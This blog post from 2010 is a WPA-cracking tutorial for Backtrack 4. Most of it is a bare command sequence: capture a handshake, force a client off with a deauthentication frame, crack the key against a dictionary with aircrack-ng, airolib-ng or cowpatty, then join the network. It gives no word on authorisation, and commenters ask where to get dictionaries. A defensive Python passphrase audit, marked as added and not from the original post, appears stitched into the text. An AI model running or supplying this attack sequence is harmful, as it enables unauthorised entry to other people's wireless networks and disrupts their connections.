
Cracking WPA with Backtrack 4

Credits to g0tmi1k. This video goes beyond just cracking WPA; it also shows how the different tools perform, and it explains the methodology very simply. Let me say that cracking WPA is not like cracking WEP. In WEP you're exploiting a vulnerability in the way the encryption algorithm is implemented, but in WPA the only vulnerability is the strength of the user's passphrase. Yes, you've guessed it: when cracking WPA, what you're basically doing is brute-forcing the user's password. In other words, the success of the attack depends on your dictionary or password list. If the user's passphrase is not in your dictionary, you will never crack the WPA key. There are several types of WPA dictionary lists out there, but I highly recommend using rainbow tables, which can be several gigabytes in size. How to find them? Google is your friend!



airmon-ng start wlan0
airodump-ng mon0

airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt

airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
airolib-ng crackwpa --import essid essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
aircrack-ng -r crackwpa output-01.cap

cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt

genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash

wpa_passphrase g0tmi1k precivilization > wpa.conf
wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
dhclient -r
dhclient wlan0
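The post's point that everything rests on the passphrase, and that the precomputed tables built by airolib-ng and genpmk are tied to one ESSID, follows from how the key is derived. The sketch below is an added example, not code from the original post or from g0tmi1k: it derives the key the way wpa_passphrase does and audits a passphrase/SSID pair from the network owner's side. The function names, the sample wordlist and the common-SSID set are constructed assumptions.

```python
import hashlib

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit WPA/WPA2-PSK master key the way wpa_passphrase does:
    PBKDF2-HMAC-SHA1, the SSID as salt, 4096 iterations."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA passphrase is 8 to 63 characters long")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def audit_psk(passphrase, ssid, wordlist, common_ssids):
    """Return the reasons this passphrase/SSID pair is exposed to dictionary attack."""
    findings = []
    if passphrase.lower() in {w.strip().lower() for w in wordlist}:
        findings.append("passphrase appears in the wordlist")
    if ssid in common_ssids:
        findings.append("SSID is common, so precomputed tables may already exist")
    return findings

# Constructed sample data (assumptions, not taken from a real dictionary or table set).
SAMPLE_WORDLIST = ["civilization", "precivilization", "prehistoric"]
SAMPLE_COMMON_SSIDS = {"linksys", "default", "NETGEAR"}

if __name__ == "__main__":
    # The SSID salts the key: a table built for one SSID is useless for another.
    a = wpa_pmk("precivilization", "g0tmi1k")
    b = wpa_pmk("precivilization", "g0tmi1k-home")
    print("same passphrase, same key across SSIDs?", a == b)
    # The passphrase used in the post is a plain dictionary word.
    print(audit_psk("precivilization", "g0tmi1k", SAMPLE_WORDLIST, SAMPLE_COMMON_SSIDS))
    # A long non-dictionary passphrase still loses the salt benefit on a common SSID.
    print(audit_psk("mauve-Tractor-41-orbit", "linksys", SAMPLE_WORDLIST, SAMPLE_COMMON_SSIDS))
```

A passphrase that is absent from every wordlist, combined with an SSID that is not a vendor default, removes both findings.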

Enjoy 😛 & source : click here


About abdessemed mohamed amine



10 thoughts on “Cracking WPA with Backtrack 4”

  1. Please Please Please send me link for download dictionary list THANK THANK THANK FOR THIS

    Posted by Petr | December 2, 2010, 00:20
  2. Hi, I want to install “tools” in Backtrack 4 R2 which include dictionaries like in your posting above.
    ’Cause I have tried it before but failed.
    Please help me.. my email : pangandaranartshop[a]yahoo.com

    Posted by joe | January 23, 2011, 07:45
  3. Nice to meet you

    Posted by reno suryaman | January 30, 2011, 13:33
  4. Dear Friend

    Salam. I tried up to this
    aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt
    but it is giving out a folder error or something like this. I checked in Backtrack and there is no folder .. can you please help me in this regard.

    Posted by SYED Malik | February 20, 2011, 10:00
  5. Hi, I want to install “tools” in Backtrack 4 R2 which include dictionaries like in your posting above.
    ’Cause I have tried it before but failed.

    Posted by tahir | March 1, 2011, 00:46
  6. You might try making it more useful for the uninitiated by explaining where to get dictionary files and how to use them with aircrack-ng. You don’t really learn anything by watching without an explanation.

    Posted by myg0t | March 26, 2011, 04:01
  7. Why did you remove the video???

    Posted by pmetal | April 20, 2012, 08:00
  8. I am genuinely delighted to read this web site's posts, which include lots of valuable information, thanks for providing these statistics.

    Posted by great site | April 27, 2013, 09:27

September 2010